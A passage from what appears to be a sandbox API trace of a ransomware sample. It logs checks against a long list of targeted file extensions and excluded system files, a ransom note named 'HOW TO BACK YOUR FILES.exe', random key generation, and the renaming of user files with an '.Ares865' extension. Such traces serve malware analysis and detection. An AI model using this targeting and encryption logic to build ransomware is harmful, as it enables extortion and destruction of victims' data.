(lpString="sdf") returned 3 [0057.688] lstrcmpiW (lpString1="-ms", lpString2="sdf") returned -1 [0057.688] lstrlenW (lpString="sis") returned 3 [0057.688] lstrcmpiW (lpString1="-ms", lpString2="sis") returned -1 [0057.688] lstrlenW (lpString="spq") returned 3 [0057.688] lstrcmpiW (lpString1="-ms", lpString2="spq") returned -1 [0057.688] lstrlenW (lpString="te") returned 2 [0057.688] lstrcmpiW (lpString1="ms", lpString2="te") returned -1 [0057.688] lstrlenW (lpString="teacher") returned 7 [0057.688] lstrcmpiW (lpString1="rans-ms", lpString2="teacher") returned -1 [0057.688] lstrlenW (lpString="tmd") returned 3 [0057.688] lstrcmpiW (lpString1="-ms", lpString2="tmd") returned -1 [0057.688] lstrlenW (lpString="tps") returned 3 [0057.688] lstrcmpiW (lpString1="-ms", lpString2="tps") returned -1 [0057.688] lstrlenW (lpString="trc") returned 3 [0057.688] lstrcmpiW (lpString1="-ms", lpString2="trc") returned -1 [0057.688] lstrlenW (lpString="trc") returned 3 [0057.688] lstrcmpiW (lpString1="-ms", lpString2="trc") returned -1 [0057.688] lstrlenW (lpString="trm") returned 3 [0057.688] lstrcmpiW (lpString1="-ms", lpString2="trm") returned -1 [0057.689] lstrlenW (lpString="udb") returned 3 [0057.689] lstrcmpiW (lpString1="-ms", lpString2="udb") returned -1 [0057.689] lstrlenW (lpString="udl") returned 3 [0057.689] lstrcmpiW (lpString1="-ms", lpString2="udl") returned -1 [0057.689] lstrlenW (lpString="usr") returned 3 [0057.689] lstrcmpiW (lpString1="-ms", lpString2="usr") returned -1 [0057.689] lstrlenW (lpString="v12") returned 3 [0057.689] lstrcmpiW (lpString1="-ms", lpString2="v12") returned -1 [0057.689] lstrlenW (lpString="vis") returned 3 [0057.689] lstrcmpiW (lpString1="-ms", lpString2="vis") returned -1 [0057.689] lstrlenW (lpString="vpd") returned 3 [0057.689] lstrcmpiW (lpString1="-ms", lpString2="vpd") returned -1 [0057.689] lstrlenW (lpString="vvv") returned 3 [0057.689] lstrcmpiW (lpString1="-ms", lpString2="vvv") returned -1 [0057.689] lstrlenW (lpString="wdb") returned 3 [0057.689] lstrcmpiW (lpString1="-ms", lpString2="wdb") returned -1 [0057.689] lstrlenW (lpString="wmdb") returned 4 [0057.689] lstrcmpiW (lpString1="s-ms", lpString2="wmdb") returned -1 [0057.689] lstrlenW (lpString="wrk") returned 3 [0057.689] lstrcmpiW (lpString1="-ms", lpString2="wrk") returned -1 [0057.689] lstrlenW (lpString="xdb") returned 3 [0057.689] lstrcmpiW (lpString1="-ms", lpString2="xdb") returned -1 [0057.689] lstrlenW (lpString="xld") returned 3 [0057.689] lstrcmpiW (lpString1="-ms", lpString2="xld") returned -1 [0057.689] lstrlenW (lpString="xmlff") returned 5 [0057.689] lstrcmpiW (lpString1="ns-ms", lpString2="xmlff") returned -1 [0057.689] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.Ares865") returned 122 [0057.689] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\default user\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms"), lpNewFileName="C:\\Users\\Default User\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.Ares865" (normalized: "c:\\users\\default user\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms.ares865"), dwFlags=0x1) returned 1 [0057.690] CreateFileW (lpFileName="C:\\Users\\Default User\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.Ares865" (normalized: "c:\\users\\default user\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0057.690] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=524288) returned 1 [0057.690] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0057.691] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0057.691] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0057.691] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0057.692] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0057.692] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0057.692] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x80300, lpName=0x0) returned 0x120 [0057.693] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x80300) returned 0x420000 [0057.928] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0057.929] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0057.929] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0057.929] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0057.929] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0057.929] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0057.929] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0057.929] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0057.929] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0057.929] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0057.929] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0057.929] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0057.930] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0057.930] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0057.934] CloseHandle (hObject=0x120) returned 1 [0057.934] CloseHandle (hObject=0x12c) returned 1 [0057.940] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0057.940] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2effc8 | out: hHeap=0x2b0000) returned 1 [0057.940] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0057.943] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.ini", cAlternateFileName="")) returned 1 [0057.943] lstrcmpiW (lpString1="ntuser.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0057.943] lstrcmpiW (lpString1="ntuser.ini", lpString2="aoldtz.exe") returned 1 [0057.943] lstrcmpiW (lpString1="ntuser.ini", lpString2=".") returned 1 [0057.943] lstrcmpiW (lpString1="ntuser.ini", lpString2="..") returned 1 [0057.943] lstrcmpiW (lpString1="ntuser.ini", lpString2="windows") returned -1 [0057.943] lstrcmpiW (lpString1="ntuser.ini", lpString2="bootmgr") returned 1 [0057.943] lstrcmpiW (lpString1="ntuser.ini", lpString2="temp") returned -1 [0057.943] lstrcmpiW (lpString1="ntuser.ini", lpString2="pagefile.sys") returned -1 [0057.943] lstrcmpiW (lpString1="ntuser.ini", lpString2="boot") returned 1 [0057.943] lstrcmpiW (lpString1="ntuser.ini", lpString2="ids.txt") returned 1 [0057.943] lstrcmpiW (lpString1="ntuser.ini", lpString2="ntuser.dat") returned 1 [0057.943] lstrcmpiW (lpString1="ntuser.ini", lpString2="perflogs") returned -1 [0057.943] lstrcmpiW (lpString1="ntuser.ini", lpString2="MSBuild") returned 1 [0057.943] lstrlenW (lpString="ntuser.ini") returned 10 [0057.943] lstrlenW (lpString="C:\\Users\\Default User\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 114 [0057.943] lstrcpyW (in: lpString1=0x2cce42c, lpString2="ntuser.ini" | out: lpString1="ntuser.ini") returned="ntuser.ini" [0057.943] lstrlenW (lpString="ntuser.ini") returned 10 [0057.943] lstrlenW (lpString="Ares865") returned 7 [0057.943] lstrcmpiW (lpString1="ser.ini", lpString2="Ares865") returned 1 [0057.943] lstrlenW (lpString=".dll") returned 4 [0057.943] lstrcmpiW (lpString1="ntuser.ini", lpString2=".dll") returned 1 [0057.943] lstrlenW (lpString=".lnk") returned 4 [0057.943] lstrcmpiW (lpString1="ntuser.ini", lpString2=".lnk") returned 1 [0057.943] lstrlenW (lpString=".ini") returned 4 [0057.944] lstrcmpiW (lpString1="ntuser.ini", lpString2=".ini") returned 1 [0057.944] lstrlenW (lpString=".sys") returned 4 [0057.944] lstrcmpiW (lpString1="ntuser.ini", lpString2=".sys") returned 1 [0057.944] lstrlenW (lpString="ntuser.ini") returned 10 [0057.944] lstrlenW (lpString="bak") returned 3 [0057.944] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0057.944] lstrlenW (lpString="ba_") returned 3 [0057.944] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0057.944] lstrlenW (lpString="dbb") returned 3 [0057.944] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0057.944] lstrlenW (lpString="vmdk") returned 4 [0057.944] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0057.944] lstrlenW (lpString="rar") returned 3 [0057.944] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0057.944] lstrlenW (lpString="zip") returned 3 [0057.944] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0057.944] lstrlenW (lpString="tgz") returned 3 [0057.944] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0057.944] lstrlenW (lpString="vbox") returned 4 [0057.944] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0057.944] lstrlenW (lpString="vdi") returned 3 [0057.944] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0057.944] lstrlenW (lpString="vhd") returned 3 [0057.944] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0057.944] lstrlenW (lpString="vhdx") returned 4 [0057.944] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0057.944] lstrlenW (lpString="avhd") returned 4 [0057.944] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0057.944] lstrlenW (lpString="db") returned 2 [0057.944] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0057.944] lstrlenW (lpString="db2") returned 3 [0057.944] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0057.944] lstrlenW (lpString="db3") returned 3 [0057.944] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0057.944] lstrlenW (lpString="dbf") returned 3 [0057.944] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0057.944] lstrlenW (lpString="mdf") returned 3 [0057.944] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0057.944] lstrlenW (lpString="mdb") returned 3 [0057.945] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0057.945] lstrlenW (lpString="sql") returned 3 [0057.945] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0057.945] lstrlenW (lpString="sqlite") returned 6 [0057.945] lstrcmpiW (lpString1="er.ini", lpString2="sqlite") returned -1 [0057.945] lstrlenW (lpString="sqlite3") returned 7 [0057.945] lstrcmpiW (lpString1="ser.ini", lpString2="sqlite3") returned -1 [0057.945] lstrlenW (lpString="sqlitedb") returned 8 [0057.945] lstrcmpiW (lpString1="user.ini", lpString2="sqlitedb") returned 1 [0057.945] lstrlenW (lpString="xml") returned 3 [0057.945] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0057.945] lstrlenW (lpString="$er") returned 3 [0057.945] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0057.945] lstrlenW (lpString="4dd") returned 3 [0057.945] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0057.945] lstrlenW (lpString="4dl") returned 3 [0057.945] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0057.945] lstrlenW (lpString="^^^") returned 3 [0057.945] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0057.945] lstrlenW (lpString="abs") returned 3 [0057.945] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0057.945] lstrlenW (lpString="abx") returned 3 [0057.945] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0057.945] lstrlenW (lpString="accdb") returned 5 [0057.945] lstrcmpiW (lpString1="r.ini", lpString2="accdb") returned 1 [0057.945] lstrlenW (lpString="accdc") returned 5 [0057.945] lstrcmpiW (lpString1="r.ini", lpString2="accdc") returned 1 [0057.945] lstrlenW (lpString="accde") returned 5 [0057.945] lstrcmpiW (lpString1="r.ini", lpString2="accde") returned 1 [0057.945] lstrlenW (lpString="accdr") returned 5 [0057.945] lstrcmpiW (lpString1="r.ini", lpString2="accdr") returned 1 [0057.945] lstrlenW (lpString="accdt") returned 5 [0057.945] lstrcmpiW (lpString1="r.ini", lpString2="accdt") returned 1 [0057.945] lstrlenW (lpString="accdw") returned 5 [0057.945] lstrcmpiW (lpString1="r.ini", lpString2="accdw") returned 1 [0057.945] lstrlenW (lpString="accft") returned 5 [0057.945] lstrcmpiW (lpString1="r.ini", lpString2="accft") returned 1 [0057.945] lstrlenW (lpString="adb") returned 3 [0057.946] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0057.946] lstrlenW (lpString="adb") returned 3 [0057.946] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0057.946] lstrlenW (lpString="ade") returned 3 [0057.946] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0057.946] lstrlenW (lpString="adf") returned 3 [0057.946] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0057.946] lstrlenW (lpString="adn") returned 3 [0057.946] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0057.946] lstrlenW (lpString="adp") returned 3 [0057.946] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0057.946] lstrlenW (lpString="alf") returned 3 [0057.946] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0057.946] lstrlenW (lpString="ask") returned 3 [0057.946] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0057.946] lstrlenW (lpString="btr") returned 3 [0057.946] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0057.946] lstrlenW (lpString="cat") returned 3 [0057.946] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0057.946] lstrlenW (lpString="cdb") returned 3 [0057.946] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0057.946] lstrlenW (lpString="ckp") returned 3 [0057.946] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0057.946] lstrlenW (lpString="cma") returned 3 [0057.946] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0057.946] lstrlenW (lpString="cpd") returned 3 [0057.946] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0057.946] lstrlenW (lpString="dacpac") returned 6 [0057.946] lstrcmpiW (lpString1="er.ini", lpString2="dacpac") returned 1 [0057.946] lstrlenW (lpString="dad") returned 3 [0057.946] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0057.946] lstrlenW (lpString="dadiagrams") returned 10 [0057.946] lstrlenW (lpString="daschema") returned 8 [0057.946] lstrcmpiW (lpString1="user.ini", lpString2="daschema") returned 1 [0057.946] lstrlenW (lpString="db-journal") returned 10 [0057.946] lstrlenW (lpString="db-shm") returned 6 [0057.946] lstrcmpiW (lpString1="er.ini", lpString2="db-shm") returned 1 [0057.947] lstrlenW (lpString="db-wal") returned 6 [0057.947] lstrcmpiW (lpString1="er.ini", lpString2="db-wal") returned 1 [0057.947] lstrlenW (lpString="dbc") returned 3 [0057.947] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0057.947] lstrlenW (lpString="dbs") returned 3 [0057.947] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0057.947] lstrlenW (lpString="dbt") returned 3 [0057.947] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0057.947] lstrlenW (lpString="dbv") returned 3 [0057.947] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0057.947] lstrlenW (lpString="dbx") returned 3 [0057.947] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0057.947] lstrlenW (lpString="dcb") returned 3 [0057.947] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0057.947] lstrlenW (lpString="dct") returned 3 [0057.947] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0057.947] lstrlenW (lpString="dcx") returned 3 [0057.947] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0057.947] lstrlenW (lpString="ddl") returned 3 [0057.947] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0057.947] lstrlenW (lpString="dlis") returned 4 [0057.947] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0057.947] lstrlenW (lpString="dp1") returned 3 [0057.947] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0057.947] lstrlenW (lpString="dqy") returned 3 [0057.947] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0057.947] lstrlenW (lpString="dsk") returned 3 [0057.947] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0057.947] lstrlenW (lpString="dsn") returned 3 [0057.947] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0057.947] lstrlenW (lpString="dtsx") returned 4 [0057.947] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0057.947] lstrlenW (lpString="dxl") returned 3 [0057.947] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0057.947] lstrlenW (lpString="eco") returned 3 [0057.947] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0057.947] lstrlenW (lpString="ecx") returned 3 [0057.948] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0057.948] lstrlenW (lpString="edb") returned 3 [0057.948] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0057.948] lstrlenW (lpString="epim") returned 4 [0057.948] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0057.948] lstrlenW (lpString="fcd") returned 3 [0057.948] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0057.948] lstrlenW (lpString="fdb") returned 3 [0057.948] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0057.948] lstrlenW (lpString="fic") returned 3 [0057.948] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0057.948] lstrlenW (lpString="flexolibrary") returned 12 [0057.948] lstrlenW (lpString="fm5") returned 3 [0057.953] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0057.953] lstrlenW (lpString="fmp") returned 3 [0057.953] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0057.953] lstrlenW (lpString="fmp12") returned 5 [0057.953] lstrcmpiW (lpString1="r.ini", lpString2="fmp12") returned 1 [0057.953] lstrlenW (lpString="fmpsl") returned 5 [0057.953] lstrcmpiW (lpString1="r.ini", lpString2="fmpsl") returned 1 [0057.953] lstrlenW (lpString="fol") returned 3 [0057.953] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0057.953] lstrlenW (lpString="fp3") returned 3 [0057.953] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0057.953] lstrlenW (lpString="fp4") returned 3 [0057.953] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0057.953] lstrlenW (lpString="fp5") returned 3 [0057.953] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0057.953] lstrlenW (lpString="fp7") returned 3 [0057.953] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0057.954] lstrlenW (lpString="fpt") returned 3 [0057.954] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0057.954] lstrlenW (lpString="frm") returned 3 [0057.954] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0057.954] lstrlenW (lpString="gdb") returned 3 [0057.954] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0057.954] lstrlenW (lpString="gdb") returned 3 [0057.954] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0057.954] lstrlenW (lpString="grdb") returned 4 [0057.954] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0057.954] lstrlenW (lpString="gwi") returned 3 [0057.954] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0057.954] lstrlenW (lpString="hdb") returned 3 [0057.954] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0057.954] lstrlenW (lpString="his") returned 3 [0057.954] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0057.954] lstrlenW (lpString="ib") returned 2 [0057.954] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0057.954] lstrlenW (lpString="idb") returned 3 [0057.954] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0057.954] lstrlenW (lpString="ihx") returned 3 [0057.954] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0057.954] lstrlenW (lpString="itdb") returned 4 [0057.954] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0057.954] lstrlenW (lpString="itw") returned 3 [0057.954] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0057.954] lstrlenW (lpString="jet") returned 3 [0057.954] lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0057.954] lstrlenW (lpString="jtx") returned 3 [0057.954] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0057.954] lstrlenW (lpString="kdb") returned 3 [0057.954] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0057.954] lstrlenW (lpString="kexi") returned 4 [0057.954] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0057.954] lstrlenW (lpString="kexic") returned 5 [0057.954] lstrcmpiW (lpString1="r.ini", lpString2="kexic") returned 1 [0057.954] lstrlenW (lpString="kexis") returned 5 [0057.955] lstrcmpiW (lpString1="r.ini", lpString2="kexis") returned 1 [0057.955] lstrlenW (lpString="lgc") returned 3 [0057.955] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0057.955] lstrlenW (lpString="lwx") returned 3 [0057.955] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0057.955] lstrlenW (lpString="maf") returned 3 [0057.955] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0057.955] lstrlenW (lpString="maq") returned 3 [0057.955] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0057.955] lstrlenW (lpString="mar") returned 3 [0057.955] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0057.955] lstrlenW (lpString="marshal") returned 7 [0057.955] lstrcmpiW (lpString1="ser.ini", lpString2="marshal") returned 1 [0057.955] lstrlenW (lpString="mas") returned 3 [0057.955] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0057.955] lstrlenW (lpString="mav") returned 3 [0057.955] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0057.955] lstrlenW (lpString="maw") returned 3 [0057.955] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0057.955] lstrlenW (lpString="mdbhtml") returned 7 [0057.955] lstrcmpiW (lpString1="ser.ini", lpString2="mdbhtml") returned 1 [0057.955] lstrlenW (lpString="mdn") returned 3 [0057.955] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0057.955] lstrlenW (lpString="mdt") returned 3 [0057.955] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0057.955] lstrlenW (lpString="mfd") returned 3 [0057.955] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0057.955] lstrlenW (lpString="mpd") returned 3 [0057.955] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0057.955] lstrlenW (lpString="mrg") returned 3 [0057.955] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0057.955] lstrlenW (lpString="mud") returned 3 [0057.955] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0057.955] lstrlenW (lpString="mwb") returned 3 [0057.955] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0057.955] lstrlenW (lpString="myd") returned 3 [0057.955] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0057.956] lstrlenW (lpString="ndf") returned 3 [0057.956] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0057.956] lstrlenW (lpString="nnt") returned 3 [0057.956] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0057.956] lstrlenW (lpString="nrmlib") returned 6 [0057.956] lstrcmpiW (lpString1="er.ini", lpString2="nrmlib") returned -1 [0057.956] lstrlenW (lpString="ns2") returned 3 [0057.956] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0057.956] lstrlenW (lpString="ns3") returned 3 [0057.956] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0057.956] lstrlenW (lpString="ns4") returned 3 [0057.956] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0057.956] lstrlenW (lpString="nsf") returned 3 [0057.956] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0057.956] lstrlenW (lpString="nv") returned 2 [0057.956] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0057.956] lstrlenW (lpString="nv2") returned 3 [0057.956] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0057.956] lstrlenW (lpString="nwdb") returned 4 [0057.956] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0057.956] lstrlenW (lpString="nyf") returned 3 [0057.956] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0057.956] lstrlenW (lpString="odb") returned 3 [0057.956] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0057.956] lstrlenW (lpString="odb") returned 3 [0057.956] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0057.956] lstrlenW (lpString="oqy") returned 3 [0057.956] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0057.956] lstrlenW (lpString="ora") returned 3 [0057.956] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0057.956] lstrlenW (lpString="orx") returned 3 [0057.956] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0057.956] lstrlenW (lpString="owc") returned 3 [0057.956] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0057.956] lstrlenW (lpString="p96") returned 3 [0057.956] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0057.956] lstrlenW (lpString="p97") returned 3 [0057.956] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0057.956] lstrlenW (lpString="pan") returned 3 [0057.957] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0057.957] lstrlenW (lpString="pdb") returned 3 [0057.957] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0057.957] lstrlenW (lpString="pdm") returned 3 [0057.957] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0057.957] lstrlenW (lpString="pnz") returned 3 [0057.957] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0057.957] lstrlenW (lpString="qry") returned 3 [0057.957] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0057.957] lstrlenW (lpString="qvd") returned 3 [0057.957] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0057.957] lstrlenW (lpString="rbf") returned 3 [0057.957] lstrcmpiW (lpString1="ini", lpString2="rbf") returned 